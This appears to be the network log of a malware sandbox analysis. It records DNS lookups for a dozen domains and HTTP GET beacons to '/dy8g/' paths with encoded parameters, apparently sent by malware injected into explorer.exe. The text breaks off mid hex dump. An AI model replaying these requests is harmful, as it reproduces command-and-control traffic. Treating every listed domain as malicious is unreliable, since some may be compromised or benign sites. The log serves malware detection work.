Jul 22, 2021 17:59:04.574091911 CEST	80	49762	78.47.57.7	192.168.2.4
Jul 22, 2021 17:59:04.887867928 CEST	80	49762	78.47.57.7	192.168.2.4
Jul 22, 2021 17:59:04.888128042 CEST	80	49762	78.47.57.7	192.168.2.4
Jul 22, 2021 17:59:04.888236046 CEST	49762	80	192.168.2.4	78.47.57.7
Jul 22, 2021 17:59:04.888264894 CEST	49762	80	192.168.2.4	78.47.57.7
Jul 22, 2021 17:59:04.958375931 CEST	80	49762	78.47.57.7	192.168.2.4
Jul 22, 2021 17:59:10.000493050 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:10.061440945 CEST	80	49763	89.46.109.25	192.168.2.4
Jul 22, 2021 17:59:10.061651945 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:10.061862946 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:10.122525930 CEST	80	49763	89.46.109.25	192.168.2.4
Jul 22, 2021 17:59:10.122562885 CEST	80	49763	89.46.109.25	192.168.2.4
Jul 22, 2021 17:59:10.122580051 CEST	80	49763	89.46.109.25	192.168.2.4
Jul 22, 2021 17:59:10.122884989 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:10.122971058 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:10.421156883 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:11.030420065 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:12.233558893 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:14.640782118 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:15.195692062 CEST	49764	80	192.168.2.4	104.21.86.209
Jul 22, 2021 17:59:15.237159014 CEST	80	49764	104.21.86.209	192.168.2.4
Jul 22, 2021 17:59:15.237281084 CEST	49764	80	192.168.2.4	104.21.86.209
Jul 22, 2021 17:59:15.237628937 CEST	49764	80	192.168.2.4	104.21.86.209
Jul 22, 2021 17:59:15.278980017 CEST	80	49764	104.21.86.209	192.168.2.4
Jul 22, 2021 17:59:15.681235075 CEST	80	49764	104.21.86.209	192.168.2.4
Jul 22, 2021 17:59:15.681271076 CEST	80	49764	104.21.86.209	192.168.2.4
Jul 22, 2021 17:59:15.681294918 CEST	80	49764	104.21.86.209	192.168.2.4
Jul 22, 2021 17:59:15.681312084 CEST	80	49764	104.21.86.209	192.168.2.4
Jul 22, 2021 17:59:15.681531906 CEST	49764	80	192.168.2.4	104.21.86.209
Jul 22, 2021 17:59:15.681598902 CEST	49764	80	192.168.2.4	104.21.86.209
Jul 22, 2021 17:59:15.681621075 CEST	80	49764	104.21.86.209	192.168.2.4
Jul 22, 2021 17:59:15.681715965 CEST	49764	80	192.168.2.4	104.21.86.209
Jul 22, 2021 17:59:19.453015089 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:26.209660053 CEST	49766	80	192.168.2.4	104.21.40.211
Jul 22, 2021 17:59:26.251007080 CEST	80	49766	104.21.40.211	192.168.2.4
Jul 22, 2021 17:59:26.254384041 CEST	49766	80	192.168.2.4	104.21.40.211
Jul 22, 2021 17:59:26.254539013 CEST	49766	80	192.168.2.4	104.21.40.211
Jul 22, 2021 17:59:26.295691013 CEST	80	49766	104.21.40.211	192.168.2.4
Jul 22, 2021 17:59:26.328947067 CEST	80	49766	104.21.40.211	192.168.2.4
Jul 22, 2021 17:59:26.328969002 CEST	80	49766	104.21.40.211	192.168.2.4
Jul 22, 2021 17:59:26.329005957 CEST	80	49766	104.21.40.211	192.168.2.4
Jul 22, 2021 17:59:26.329252005 CEST	49766	80	192.168.2.4	104.21.40.211
Jul 22, 2021 17:59:26.329374075 CEST	49766	80	192.168.2.4	104.21.40.211
Jul 22, 2021 17:59:29.063158035 CEST	49763	80	192.168.2.4	89.46.109.25
Jul 22, 2021 17:59:42.142477989 CEST	49768	80	192.168.2.4	162.241.62.54
Jul 22, 2021 17:59:42.308490038 CEST	80	49768	162.241.62.54	192.168.2.4
Jul 22, 2021 17:59:42.309855938 CEST	49768	80	192.168.2.4	162.241.62.54
Jul 22, 2021 17:59:42.309887886 CEST	49768	80	192.168.2.4	162.241.62.54
Jul 22, 2021 17:59:42.475857019 CEST	80	49768	162.241.62.54	192.168.2.4
Jul 22, 2021 17:59:42.799355030 CEST	49768	80	192.168.2.4	162.241.62.54
Jul 22, 2021 17:59:43.005626917 CEST	80	49768	162.241.62.54	192.168.2.4
Jul 22, 2021 17:59:43.077874899 CEST	80	49768	162.241.62.54	192.168.2.4
Jul 22, 2021 17:59:43.077910900 CEST	80	49768	162.241.62.54	192.168.2.4
Jul 22, 2021 17:59:43.077923059 CEST	80	49768	162.241.62.54	192.168.2.4
Jul 22, 2021 17:59:43.078068972 CEST	49768	80	192.168.2.4	162.241.62.54
Jul 22, 2021 17:59:43.078102112 CEST	49768	80	192.168.2.4	162.241.62.54
Jul 22, 2021 17:59:43.078602076 CEST	49768	80	192.168.2.4	162.241.62.54
Jul 22, 2021 17:59:43.079334974 CEST	80	49768	162.241.62.54	192.168.2.4
Jul 22, 2021 17:59:43.079477072 CEST	49768	80	192.168.2.4	162.241.62.54
Jul 22, 2021 17:59:43.079710007 CEST	80	49768	162.241.62.54	192.168.2.4
Jul 22, 2021 17:59:43.079770088 CEST	49768	80	192.168.2.4	162.241.62.54
Jul 22, 2021 17:59:47.896868944 CEST	49769	80	192.168.2.4	172.67.129.33
Jul 22, 2021 17:59:47.938344955 CEST	80	49769	172.67.129.33	192.168.2.4
Jul 22, 2021 17:59:47.938543081 CEST	49769	80	192.168.2.4	172.67.129.33
Jul 22, 2021 17:59:47.938975096 CEST	49769	80	192.168.2.4	172.67.129.33
Jul 22, 2021 17:59:47.980230093 CEST	80	49769	172.67.129.33	192.168.2.4
Jul 22, 2021 17:59:48.012661934 CEST	80	49769	172.67.129.33	192.168.2.4
Jul 22, 2021 17:59:48.012758970 CEST	80	49769	172.67.129.33	192.168.2.4
Jul 22, 2021 17:59:48.013010979 CEST	49769	80	192.168.2.4	172.67.129.33
Jul 22, 2021 17:59:48.013118982 CEST	49769	80	192.168.2.4	172.67.129.33
Jul 22, 2021 17:59:48.054305077 CEST	80	49769	172.67.129.33	192.168.2.4
Jul 22, 2021 17:59:53.083327055 CEST	49770	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:59:53.125459909 CEST	80	49770	34.102.136.180	192.168.2.4
Jul 22, 2021 17:59:53.125825882 CEST	49770	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:59:53.125844002 CEST	49770	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:59:53.168087959 CEST	80	49770	34.102.136.180	192.168.2.4
Jul 22, 2021 17:59:53.264167070 CEST	80	49770	34.102.136.180	192.168.2.4
Jul 22, 2021 17:59:53.264195919 CEST	80	49770	34.102.136.180	192.168.2.4
Jul 22, 2021 17:59:53.264467001 CEST	49770	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:59:53.264487028 CEST	49770	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:59:53.565701962 CEST	49770	80	192.168.2.4	34.102.136.180
Jul 22, 2021 17:59:53.607755899 CEST	80	49770	34.102.136.180	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 17:57:36.313282967 CEST	65298	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:36.315349102 CEST	59123	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:36.370449066 CEST	53	65298	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:36.376116037 CEST	53	59123	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:37.161740065 CEST	54531	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:37.223788977 CEST	53	54531	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:40.991270065 CEST	49714	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:41.046431065 CEST	53	49714	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:42.190628052 CEST	58028	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:42.242769003 CEST	53	58028	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:43.205693007 CEST	53097	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:43.254811049 CEST	53	53097	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:44.032094955 CEST	49257	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:44.097603083 CEST	53	49257	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:44.927361012 CEST	62389	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:44.984817982 CEST	53	62389	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:45.935471058 CEST	49910	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:45.990206003 CEST	53	49910	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:47.089982986 CEST	55854	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:47.146457911 CEST	53	55854	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:47.935260057 CEST	64549	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:47.988466024 CEST	53	64549	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:54.258121014 CEST	63153	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:54.310722113 CEST	53	63153	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:55.075237036 CEST	52991	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:55.127279997 CEST	53	52991	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:56.146461964 CEST	53700	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:56.203408957 CEST	53	53700	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:57.177795887 CEST	51726	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:57.229603052 CEST	53	51726	8.8.8.8	192.168.2.4
Jul 22, 2021 17:57:58.215534925 CEST	56794	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:57:58.272744894 CEST	53	56794	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:00.120146990 CEST	56534	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:00.180008888 CEST	53	56534	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:02.403296947 CEST	56627	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:02.455421925 CEST	53	56627	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:03.777609110 CEST	56621	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:03.827518940 CEST	53	56621	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:04.793417931 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:04.864845037 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:04.971244097 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:05.020303965 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:06.124804020 CEST	64801	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:06.184788942 CEST	53	64801	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:27.728662014 CEST	61721	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:27.825376987 CEST	53	61721	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:28.940677881 CEST	51255	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:29.000389099 CEST	53	51255	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:30.017081976 CEST	61522	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:30.073992968 CEST	53	61522	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:30.153373003 CEST	52337	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:30.215703964 CEST	53	52337	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:30.556526899 CEST	55046	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:30.622924089 CEST	53	55046	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:30.852163076 CEST	49612	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:30.933320045 CEST	53	49612	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:32.018532038 CEST	49285	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:32.078849077 CEST	53	49285	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:33.087373018 CEST	50601	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:33.149784088 CEST	53	50601	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:35.333154917 CEST	60875	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:35.393279076 CEST	53	60875	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:36.999396086 CEST	56448	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:37.060000896 CEST	53	56448	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:38.619467020 CEST	59172	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:38.676644087 CEST	53	59172	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:39.654539108 CEST	62420	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:39.714941025 CEST	53	62420	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:49.895446062 CEST	60579	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:49.956135035 CEST	53	60579	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:53.528120041 CEST	50183	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:53.591170073 CEST	53	50183	8.8.8.8	192.168.2.4
Jul 22, 2021 17:58:58.804101944 CEST	61531	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:58:58.863302946 CEST	53	61531	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:04.268095970 CEST	49228	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:04.431778908 CEST	53	49228	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:09.924380064 CEST	59794	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:09.999142885 CEST	53	59794	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:15.129786968 CEST	55916	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:15.193748951 CEST	53	55916	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:20.707901001 CEST	52752	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:21.100776911 CEST	53	52752	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:24.303745031 CEST	60542	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:24.368860006 CEST	53	60542	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:26.142884016 CEST	60689	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:26.208291054 CEST	53	60689	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:26.827694893 CEST	64206	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:26.892404079 CEST	53	64206	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:31.349689960 CEST	50904	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:31.431299925 CEST	53	50904	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:36.442914963 CEST	57525	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:36.513633013 CEST	53	57525	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:41.937380075 CEST	53814	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:42.140947104 CEST	53	53814	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:47.820266962 CEST	53418	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:47.895555019 CEST	53	53418	8.8.8.8	192.168.2.4
Jul 22, 2021 17:59:53.020230055 CEST	62833	53	192.168.2.4	8.8.8.8
Jul 22, 2021 17:59:53.082292080 CEST	53	62833	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 22, 2021 17:58:53.528120041 CEST	192.168.2.4	8.8.8.8	0xa643	Standard query (0)	www.fitnesstwentytwenty.com	A (IP address)	IN (0x0001)
Jul 22, 2021 17:58:58.804101944 CEST	192.168.2.4	8.8.8.8	0x288f	Standard query (0)	www.melodezu.com	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:04.268095970 CEST	192.168.2.4	8.8.8.8	0xbfe0	Standard query (0)	www.sprinkleresources.com	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:09.924380064 CEST	192.168.2.4	8.8.8.8	0x7f21	Standard query (0)	www.professioneconsulenza.net	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:15.129786968 CEST	192.168.2.4	8.8.8.8	0x14a9	Standard query (0)	www.iwccgroup.com	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:20.707901001 CEST	192.168.2.4	8.8.8.8	0x4733	Standard query (0)	www.saludflv.info	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:26.142884016 CEST	192.168.2.4	8.8.8.8	0x8bdf	Standard query (0)	www.manageoceanaccount.com	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:31.349689960 CEST	192.168.2.4	8.8.8.8	0xf3f8	Standard query (0)	www.cwdelrio.com	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:36.442914963 CEST	192.168.2.4	8.8.8.8	0x1bf3	Standard query (0)	www.mydreamtv.net	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:41.937380075 CEST	192.168.2.4	8.8.8.8	0x7e22	Standard query (0)	www.jorgeporcayo.com	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:47.820266962 CEST	192.168.2.4	8.8.8.8	0xd2f9	Standard query (0)	www.builtbydawn.com	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:53.020230055 CEST	192.168.2.4	8.8.8.8	0xbf7	Standard query (0)	www.invisiongc.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 22, 2021 17:58:53.591170073 CEST	8.8.8.8	192.168.2.4	0xa643	No error (0)	www.fitnesstwentytwenty.com	fitnesstwentytwenty.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 17:58:53.591170073 CEST	8.8.8.8	192.168.2.4	0xa643	No error (0)	fitnesstwentytwenty.com		34.102.136.180	A (IP address)	IN (0x0001)
Jul 22, 2021 17:58:58.863302946 CEST	8.8.8.8	192.168.2.4	0x288f	No error (0)	www.melodezu.com	melodezu.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 17:58:58.863302946 CEST	8.8.8.8	192.168.2.4	0x288f	No error (0)	melodezu.com		64.227.87.162	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:04.431778908 CEST	8.8.8.8	192.168.2.4	0xbfe0	No error (0)	www.sprinkleresources.com	sprinkleresources.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 17:59:04.431778908 CEST	8.8.8.8	192.168.2.4	0xbfe0	No error (0)	sprinkleresources.com		78.47.57.7	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:09.999142885 CEST	8.8.8.8	192.168.2.4	0x7f21	No error (0)	www.professioneconsulenza.net		89.46.109.25	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:15.193748951 CEST	8.8.8.8	192.168.2.4	0x14a9	No error (0)	www.iwccgroup.com		104.21.86.209	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:15.193748951 CEST	8.8.8.8	192.168.2.4	0x14a9	No error (0)	www.iwccgroup.com		172.67.136.222	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:21.100776911 CEST	8.8.8.8	192.168.2.4	0x4733	Server failure (2)	www.saludflv.info	none	none	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:26.208291054 CEST	8.8.8.8	192.168.2.4	0x8bdf	No error (0)	www.manageoceanaccount.com		104.21.40.211	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:26.208291054 CEST	8.8.8.8	192.168.2.4	0x8bdf	No error (0)	www.manageoceanaccount.com		172.67.188.96	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:31.431299925 CEST	8.8.8.8	192.168.2.4	0xf3f8	Name error (3)	www.cwdelrio.com	none	none	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:36.513633013 CEST	8.8.8.8	192.168.2.4	0x1bf3	Name error (3)	www.mydreamtv.net	none	none	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:42.140947104 CEST	8.8.8.8	192.168.2.4	0x7e22	No error (0)	www.jorgeporcayo.com	jorgeporcayo.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 17:59:42.140947104 CEST	8.8.8.8	192.168.2.4	0x7e22	No error (0)	jorgeporcayo.com		162.241.62.54	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:47.895555019 CEST	8.8.8.8	192.168.2.4	0xd2f9	No error (0)	www.builtbydawn.com		172.67.129.33	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:47.895555019 CEST	8.8.8.8	192.168.2.4	0xd2f9	No error (0)	www.builtbydawn.com		104.21.2.115	A (IP address)	IN (0x0001)
Jul 22, 2021 17:59:53.082292080 CEST	8.8.8.8	192.168.2.4	0xbf7	No error (0)	www.invisiongc.net	invisiongc.net		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 17:59:53.082292080 CEST	8.8.8.8	192.168.2.4	0xbf7	No error (0)	invisiongc.net		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.fitnesstwentytwenty.com

www.melodezu.com

www.sprinkleresources.com

www.professioneconsulenza.net

www.iwccgroup.com

www.manageoceanaccount.com

www.jorgeporcayo.com

www.builtbydawn.com

www.invisiongc.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49760	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 17:58:53.644109964 CEST	8106	OUT	GET /dy8g/?4hoDb=IhkJQD+B0bk6+V2yAPUkLiiPXbQYCeTmh4O7f9n2kBTH706egIRBsrjYfWBeBd2LV0Ma&m4L0u=bZcPvDKxdtw HTTP/1.1 Host: www.fitnesstwentytwenty.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 17:58:53.783077955 CEST	8107	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Thu, 22 Jul 2021 15:58:53 GMT Content-Type: text/html Content-Length: 275 ETag: "60ef677e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49761	64.227.87.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 17:58:59.060558081 CEST	8108	OUT	GET /dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw HTTP/1.1 Host: www.melodezu.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 17:58:59.252990961 CEST	8109	IN	HTTP/1.1 404 Not Found Date: Thu, 22 Jul 2021 15:58:59 GMT Server: Apache/2.4.18 (Ubuntu) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49762	78.47.57.7	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 17:59:04.504060984 CEST	8110	OUT	GET /dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw HTTP/1.1 Host: www.sprinkleresources.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 17:59:04.887867928 CEST	8110	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 22 Jul 2021 15:59:04 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://sprinkleresources.com/dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49763	89.46.109.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 17:59:10.061862946 CEST	8111	OUT	GET /dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw HTTP/1.1 Host: www.professioneconsulenza.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 17:59:10.122562885 CEST	8112	IN	HTTP/1.1 301 Moved Permanently Server: aruba-proxy Date: Thu, 22 Jul 2021 15:59:10 GMT Content-Type: text/html Content-Length: 168 Connection: close Location: https://www.professioneconsulenza.net/dy8g/?4hoDb=B6XRNEXBM36CngModurpGrvJhOmsW28/SGtim1Ppn9j53l0DJdxuAnVFBlFsUFB06+ev&m4L0u=bZcPvDKxdtw X-ServerName: ipvsproxy177.ad.aruba.it Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 